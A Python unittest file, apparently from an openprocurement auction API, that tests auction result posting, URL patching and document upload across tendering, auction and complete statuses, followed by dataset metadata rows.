self.initial_bids[1]['id'])}]}
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{u'description': [{u'participationUrl': [
u'url should be posted for each lot of bid']}], u'location': u'body', u'name': u'bids'}])
del patch_data['bids'][0]["participationUrl"]
patch_data['bids'][0]['lotValues'] = [
{
"participationUrl": u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
self.auction_id,
self.initial_bids[0]['id'])}]
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{u'description': [
"url should be posted for each lot"], u'location': u'body', u'name': u'auctionUrl'}])
patch_data['lots'] = [
{
"auctionUrl": patch_data.pop('auctionUrl')
}
]
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Number of auction results did not match the number of auction bids")
patch_data['bids'].append(
{'lotValues': [
{
"participationUrl":
u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
self.auction_id,
self.initial_bids[0]['id']
)
}
]}
)
patch_data['bids'][1]['id'] = "some_id"
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], {
u'id': [u'Hash value is wrong length.']})
patch_data['bids'][1]['id'] = "00000000000000000000000000000000"
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Auction bids should be identical to the auction bids")
patch_data['bids'][1]['id'] = self.initial_bids[0]['id']
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertIsNone(response.json)
for lot in self.initial_lots:
response = self.app.patch_json(
'/auctions/{}/auction/{}'.format(self.auction_id, lot['id']), {'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertEqual(
auction["bids"][0]['lotValues'][0]['participationUrl'],
patch_data["bids"][1]['lotValues'][0]['participationUrl'])
self.assertEqual(
auction["bids"][1]['lotValues'][0]['participationUrl'],
patch_data["bids"][0]['lotValues'][0]['participationUrl'])
self.assertEqual(
auction["lots"][0]['auctionUrl'],
patch_data["lots"][0]['auctionUrl'])
self.set_status('complete')
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't update auction urls in current (complete) auction status")
def test_post_auction_auction_document(self):
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post(
'/auctions/{}/documents'.format(
self.auction_id), upload_files=[
('file', 'name.doc', 'content')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't add document in current (active.tendering) auction status")
self.set_status('active.auction')
response = self.app.post(
'/auctions/{}/documents'.format(
self.auction_id), upload_files=[
('file', 'name.doc', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
key = response.json["data"]["url"].split('?')[-1].split('=')[-1]
response = self.app.patch_json(
'/auctions/{}/documents/{}'.format(
self.auction_id, doc_id), {
'data': {
"documentOf": "lot", 'relatedItem': self.initial_lots[0]['id']}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentOf"], "lot")
self.assertEqual(
response.json["data"]["relatedItem"],
self.initial_lots[0]['id'])
patch_data = {
'bids': [
{
"id": self.initial_bids[1]['id'],
'lotValues': [
{
"value": {
"amount": 409,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
]
},
{
'id': self.initial_bids[0]['id'],
'lotValues': [
{
"value": {
"amount": 419,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
]
}
]
}
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.put(
'/auctions/{}/documents/{}'.format(
self.auction_id, doc_id), upload_files=[
('file', 'name.doc', 'content_with_names')])
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
key2 = response.json["data"]["url"].split('?')[-1].split('=')[-1]
self.assertNotEqual(key, key2)
self.set_status('complete')
response = self.app.post(
'/auctions/{}/documents'.format(
self.auction_id), upload_files=[
('file', 'name.doc', 'content')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't add document in current (complete) auction status")
class AuctionMultipleLotAuctionResourceTest(AuctionAuctionResourceTest):
initial_lots = 2 * test_lots
def test_get_auction_auction(self):
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get(
'/auctions/{}/auction'.format(self.auction_id), status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't get auction info in current (active.tendering) auction status")
self.set_status('active.auction')
response = self.app.get('/auctions/{}/auction'.format(self.auction_id))
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertNotEqual(auction, self.initial_data)
self.assertIn('dateModified', auction)
self.assertIn('minimalStep', auction)
self.assertIn('lots', auction)
self.assertNotIn("procuringEntity", auction)
self.assertNotIn("tenderers", auction["bids"][0])
self.assertEqual(
auction["bids"][0]['lotValues'][0]['value']['amount'],
self.initial_bids[0]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["bids"][1]['lotValues'][0]['value']['amount'],
self.initial_bids[1]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["bids"][0]['lotValues'][1]['value']['amount'],
self.initial_bids[0]['lotValues'][1]['value']['amount'])
self.assertEqual(
auction["bids"][1]['lotValues'][1]['value']['amount'],
self.initial_bids[1]['lotValues'][1]['value']['amount'])
self.set_status('active.qualification')
response = self.app.get(
'/auctions/{}/auction'.format(self.auction_id), status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't get auction info in current (active.qualification) auction status")
def test_post_auction_auction(self):
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': {}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't report auction results in current (active.tendering) auction status")
self.set_status('active.auction')
response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {
'data': {'bids': [{'invalid_field': 'invalid_value'}]}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{u'description': {
u'invalid_field': u'Rogue field'}, u'location': u'body', u'name': u'bids'}])
patch_data = {
'bids': [
{
"id": self.initial_bids[1]['id'],
'lotValues': [
{
"value": {
"amount": 419,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
]
}
]
}
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Number of auction results did not match the number of auction bids")
patch_data['bids'].append({
'lotValues': [
{
"value": {
"amount": 409,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
]
})
patch_data['bids'][1]['id'] = "some_id"
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], {
u'id': [u'Hash value is wrong length.']})
patch_data['bids'][1]['id'] = "00000000000000000000000000000000"
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Auction bids should be identical to the auction bids")
patch_data['bids'][1]['id'] = self.initial_bids[0]['id']
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], [{"lotValues": [
"Number of lots of auction results did not match the number of auction lots"]}])
for bid in patch_data['bids']:
bid['lotValues'] = [bid['lotValues'][0].copy()
for i in self.initial_lots]
patch_data['bids'][0]['lotValues'][1]['relatedLot'] = self.initial_bids[0]['lotValues'][0]['relatedLot']
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], [{u'lotValues': [
{u'relatedLot': [u'relatedLot should be one of lots of bid']}]}])
patch_data['bids'][0]['lotValues'][1]['relatedLot'] = self.initial_bids[0]['lotValues'][1]['relatedLot']
for lot in self.initial_lots:
response = self.app.post_json(
'/auctions/{}/auction/{}'.format(self.auction_id, lot['id']), {'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertNotEqual(
auction["bids"][0]['lotValues'][0]['value']['amount'],
self.initial_bids[0]['lotValues'][0]['value']['amount'])
self.assertNotEqual(
auction["bids"][1]['lotValues'][0]['value']['amount'],
self.initial_bids[1]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["bids"][0]['lotValues'][0]['value']['amount'],
patch_data["bids"][1]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["bids"][1]['lotValues'][0]['value']['amount'],
patch_data["bids"][0]['lotValues'][0]['value']['amount'])
self.assertEqual('active.qualification', auction["status"])
self.assertIn("tenderers", auction["bids"][0])
self.assertIn("name", auction["bids"][0]["tenderers"][0])
# self.assertIn(auction["awards"][0]["id"], response.headers['Location'])
self.assertEqual(
auction["awards"][0]['bid_id'],
patch_data["bids"][0]['id'])
self.assertEqual(
auction["awards"][0]['value']['amount'],
patch_data["bids"][0]['lotValues'][0]['value']['amount'])
self.assertEqual(
auction["awards"][0]['suppliers'],
self.initial_bids[0]['tenderers'])
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't report auction results in current (active.qualification) auction status")
def test_patch_auction_auction(self):
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': {}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't update auction urls in current (active.tendering) auction status")
self.set_status('active.auction')
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json(
'/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.patch_json('/auctions/{}/auction'.format(self.auction_id), {
'data': {'bids': [{'invalid_field': 'invalid_value'}]}}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{u'description': {
u'invalid_field': u'Rogue field'}, u'location': u'body', u'name': u'bids'}])
patch_data = {
'auctionUrl': u'http://auction-sandbox.openprocurement.org/auctions/{}'.format(
self.auction_id),
'bids': [
{
"id": self.initial_bids[1]['id'],
"participationUrl": u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
self.auction_id,
self.initial_bids[1]['id'])}]}
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{u'description': [{u'participationUrl': [
u'url should be posted for each lot of bid']}], u'location': u'body', u'name': u'bids'}])
del patch_data['bids'][0]["participationUrl"]
patch_data['bids'][0]['lotValues'] = [
{
"participationUrl": u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
self.auction_id,
self.initial_bids[0]['id'])}]
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'], [{u'description': [
"url should be posted for each lot"], u'location': u'body', u'name': u'auctionUrl'}])
patch_data['lots'] = [
{
"auctionUrl": patch_data.pop('auctionUrl')
}
]
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Number of auction results did not match the number of auction bids")
patch_data['bids'].append(
{
'lotValues': [
{
"participationUrl":
u'http://auction-sandbox.openprocurement.org/auctions/{}?key_for_bid={}'.format(
self.auction_id,
self.initial_bids[0]['id'])}]})
patch_data['bids'][1]['id'] = "some_id"
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], {
u'id': [u'Hash value is wrong length.']})
patch_data['bids'][1]['id'] = "00000000000000000000000000000000"
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Auction bids should be identical to the auction bids")
patch_data['bids'][1]['id'] = self.initial_bids[0]['id']
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
u'Number of lots did not match the number of auction lots')
patch_data['lots'] = [patch_data['lots'][0].copy()
for i in self.initial_lots]
patch_data['lots'][1]['id'] = "00000000000000000000000000000000"
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
u'Auction lots should be identical to the auction lots')
patch_data['lots'][1]['id'] = self.initial_lots[1]['id']
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], [{"lotValues": [
"Number of lots of auction results did not match the number of auction lots"]}])
for bid in patch_data['bids']:
bid['lotValues'] = [bid['lotValues'][0].copy()
for i in self.initial_lots]
patch_data['bids'][0]['lotValues'][1]['relatedLot'] = self.initial_bids[0]['lotValues'][0]['relatedLot']
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data}, status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json['errors'][0]["description"], [{u'lotValues': [
{u'relatedLot': [u'relatedLot should be one of lots of bid']}]}])
patch_data['bids'][0]['lotValues'][1]['relatedLot'] = self.initial_bids[0]['lotValues'][1]['relatedLot']
response = self.app.patch_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertIsNone(response.json)
for lot in self.initial_lots:
response = self.app.patch_json(
'/auctions/{}/auction/{}'.format(self.auction_id, lot['id']), {'data': patch_data}
)
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
auction = response.json['data']
self.assertEqual(
auction["bids"][0]['lotValues'][0]['participationUrl'],
patch_data["bids"][1]['lotValues'][0]['participationUrl'])
self.assertEqual(
auction["bids"][1]['lotValues'][0]['participationUrl'],
patch_data["bids"][0]['lotValues'][0]['participationUrl'])
self.assertEqual(
auction["lots"][0]['auctionUrl'],
patch_data["lots"][0]['auctionUrl'])
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/auctions/{}/cancellations?acc_token={}'.format(
self.auction_id, self.auction_token
), {'data': {'reason': 'cancellation reason',
'status': 'active',
'cancellationOf': 'lot',
'relatedLot': self.initial_lots[0]['id']}
}
)
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.patch_json(
'/auctions/{}/auction/{}'.format(
self.auction_id, self.initial_lots[0]['id']), {
'data': patch_data}, status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can update auction urls only in active lot status")
def test_post_auction_auction_document(self):
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.post(
'/auctions/{}/documents'.format(
self.auction_id), upload_files=[
('file', 'name.doc', 'content')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't add document in current (active.tendering) auction status")
self.set_status('active.auction')
response = self.app.post(
'/auctions/{}/documents'.format(
self.auction_id), upload_files=[
('file', 'name.doc', 'content')])
self.assertEqual(response.status, '201 Created')
self.assertEqual(response.content_type, 'application/json')
doc_id = response.json["data"]['id']
key = response.json["data"]["url"].split('?')[-1].split('=')[-1]
response = self.app.patch_json(
'/auctions/{}/documents/{}'.format(
self.auction_id, doc_id), {
'data': {
"documentOf": "lot", 'relatedItem': self.initial_lots[0]['id']}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(response.json["data"]["documentOf"], "lot")
self.assertEqual(
response.json["data"]["relatedItem"],
self.initial_lots[0]['id'])
patch_data = {
'bids': [
{
"id": self.initial_bids[1]['id'],
'lotValues': [
{
"value": {
"amount": 409,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
for i in self.initial_lots
]
},
{
'id': self.initial_bids[0]['id'],
'lotValues': [
{
"value": {
"amount": 419,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
for i in self.initial_lots
]
}
]
}
response = self.app.post_json(
'/auctions/{}/auction'.format(self.auction_id), {'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
response = self.app.put(
'/auctions/{}/documents/{}'.format(
self.auction_id, doc_id), upload_files=[
('file', 'name.doc', 'content_with_names')])
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(doc_id, response.json["data"]["id"])
key2 = response.json["data"]["url"].split('?')[-1].split('=')[-1]
self.assertNotEqual(key, key2)
self.set_status('complete')
response = self.app.post(
'/auctions/{}/documents'.format(
self.auction_id), upload_files=[
('file', 'name.doc', 'content')], status=403)
self.assertEqual(response.status, '403 Forbidden')
self.assertEqual(response.content_type, 'application/json')
self.assertEqual(
response.json['errors'][0]["description"],
"Can't add document in current (complete) auction status")
class AuctionFeaturesAuctionResourceTest(BaseAuctionWebTest):
initial_data = test_features_auction_data
initial_status = 'active.auction'
initial_bids = [
{
"parameters": [
{
"code": i["code"],
"value": 0.1,
}
for i in test_features_auction_data['features']
],
"tenderers": [
test_organization
],
"value": {
"amount": 469,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
},
{
"parameters": [
{
"code": i["code"],
"value": 0.15,
}
for i in test_features_auction_data['features']
],
"tenderers": [
test_organization
],
"value": {
"amount": 479,
"currency": "UAH",
"valueAddedTaxIncluded": True
}
}
]
test_get_auction_auction = snitch(get_auction_features_auction)
class FlashAuctionBridgePeriodPatchTest(BaseAuctionWebTest):
initial_bids = test_bids
test_set_auction_period = snitch(set_auction_period)
test_reset_auction_period = snitch(reset_auction_period)
def suite():
tests = unittest.TestSuite()
tests.addTest(unittest.makeSuite(AuctionAuctionResourceTest))
tests.addTest(unittest.makeSuite(AuctionSameValueAuctionResourceTest))
tests.addTest(unittest.makeSuite(AuctionLotAuctionResourceTest))
tests.addTest(unittest.makeSuite(AuctionMultipleLotAuctionResourceTest))
tests.addTest(unittest.makeSuite(AuctionFeaturesAuctionResourceTest))
tests.addTest(unittest.makeSuite(FlashAuctionBridgePeriodPatchTest))
return tests
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 44.962129
| 120
| 0.565744
| 4,292
| 43,928
| 5.672647
| 0.042404
| 0.117674
| 0.155871
| 0.053846
| 0.929232
| 0.916335
| 0.907504
| 0.902575
| 0.891486
| 0.889555
| 0
| 0.02275
| 0.281529
| 43,928
| 976
| 121
| 45.008197
| 0.748677
| 0.004439
| 0
| 0.804245
| 0
| 0
| 0.248056
| 0.019781
| 0
| 0
| 0
| 0
| 0.253538
| 1
| 0.010613
| false
| 0
| 0.007075
| 0
| 0.04717
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa363e503b7714da4a917b33df4650be6baf6a00
| 133
|
py
|
Python
|
octmaps/io/__init__.py
|
bisselma/octmaps
|
3b215e787ff9242f702b26d5d933191085e326f8
|
[
"MIT"
] | null | null | null |
octmaps/io/__init__.py
|
bisselma/octmaps
|
3b215e787ff9242f702b26d5d933191085e326f8
|
[
"MIT"
] | null | null | null |
octmaps/io/__init__.py
|
bisselma/octmaps
|
3b215e787ff9242f702b26d5d933191085e326f8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from .vol_map_generator import HeyexVolMapsGenerator
from .xml_map_generator import HeyexXmlMapsGenerator
| 33.25
| 53
| 0.796992
| 15
| 133
| 6.8
| 0.733333
| 0.235294
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 0.120301
| 133
| 3
| 54
| 44.333333
| 0.863248
| 0.157895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d72a8c149f314f256994d0fc767bf218c3e35017
| 255
|
py
|
Python
|
functions/helpers.py
|
nadiahpk/niche-neutral-riau-birds
|
83eeba57973d6912ad354592c84a03b5c24b3363
|
[
"Unlicense"
] | null | null | null |
functions/helpers.py
|
nadiahpk/niche-neutral-riau-birds
|
83eeba57973d6912ad354592c84a03b5c24b3363
|
[
"Unlicense"
] | null | null | null |
functions/helpers.py
|
nadiahpk/niche-neutral-riau-birds
|
83eeba57973d6912ad354592c84a03b5c24b3363
|
[
"Unlicense"
] | null | null | null |
def standardise_name(string):
# colleagues keep on changing the data
# this avoids issues with arbitrary upper and lower cases etc.
return( string.lower().replace(' ', '_').replace('-','_').replace('\'','').replace('(','').replace(')','') )
| 36.428571
| 112
| 0.627451
| 28
| 255
| 5.607143
| 0.785714
| 0.356688
| 0.401274
| 0.356688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152941
| 255
| 6
| 113
| 42.5
| 0.726852
| 0.380392
| 0
| 0
| 0
| 0
| 0.181818
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
d772db0784526b732165024da400ec57e48d68ab
| 81
|
py
|
Python
|
icanhaz/tests/__init__.py
|
carljm/django-icanhaz
|
57939325850058959c1ee8dce13e2b8c28156532
|
[
"BSD-3-Clause"
] | 3
|
2015-11-18T02:04:34.000Z
|
2021-02-21T03:12:46.000Z
|
icanhaz/tests/__init__.py
|
carljm/django-icanhaz
|
57939325850058959c1ee8dce13e2b8c28156532
|
[
"BSD-3-Clause"
] | null | null | null |
icanhaz/tests/__init__.py
|
carljm/django-icanhaz
|
57939325850058959c1ee8dce13e2b8c28156532
|
[
"BSD-3-Clause"
] | 2
|
2016-02-04T16:28:47.000Z
|
2016-04-06T16:18:17.000Z
|
from .test_finders import *
from .test_loading import *
from .test_ttag import *
| 20.25
| 27
| 0.777778
| 12
| 81
| 5
| 0.5
| 0.4
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 81
| 3
| 28
| 27
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ad0c4a317bdd27ee30f2bfadf25ae9c7f408a0e5
| 1,298
|
py
|
Python
|
tests/test_1927.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1927.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_1927.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 1927. Sum Game
"""
@pytest.fixture(scope="session")
def init_variables_1927():
from src.leetcode_1927_sum_game import Solution
solution = Solution()
def _init_variables_1927():
return solution
yield _init_variables_1927
class TestClass1927:
def test_solution_0(self, init_variables_1927):
assert not init_variables_1927().sumGame("5023")
def test_solution_1(self, init_variables_1927):
assert init_variables_1927().sumGame("25??")
def test_solution_2(self, init_variables_1927):
assert not init_variables_1927().sumGame("?3295???")
#!/usr/bin/env python
import pytest
"""
Test 1927. Sum Game
"""
@pytest.fixture(scope="session")
def init_variables_1927():
from src.leetcode_1927_sum_game import Solution
solution = Solution()
def _init_variables_1927():
return solution
yield _init_variables_1927
class TestClass1927:
def test_solution_0(self, init_variables_1927):
assert not init_variables_1927().sumGame("5023")
def test_solution_1(self, init_variables_1927):
assert init_variables_1927().sumGame("25??")
def test_solution_2(self, init_variables_1927):
assert not init_variables_1927().sumGame("?3295???")
| 20.603175
| 60
| 0.713405
| 168
| 1,298
| 5.166667
| 0.202381
| 0.269585
| 0.352535
| 0.145161
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.114662
| 0.180277
| 1,298
| 62
| 61
| 20.935484
| 0.701128
| 0.030817
| 0
| 1
| 0
| 0
| 0.03827
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.333333
| false
| 0
| 0.133333
| 0.066667
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 11
|
ad8561e6e50b21a52b30483aa9c77b2a9f6b7282
| 42,885
|
py
|
Python
|
spark_fhir_schemas/r4/resources/chargeitem.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | 2
|
2020-10-31T23:25:01.000Z
|
2021-06-09T14:12:42.000Z
|
spark_fhir_schemas/r4/resources/chargeitem.py
|
imranq2/SparkFhirSchemas
|
24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | null | null | null |
spark_fhir_schemas/r4/resources/chargeitem.py
|
imranq2/SparkFhirSchemas
|
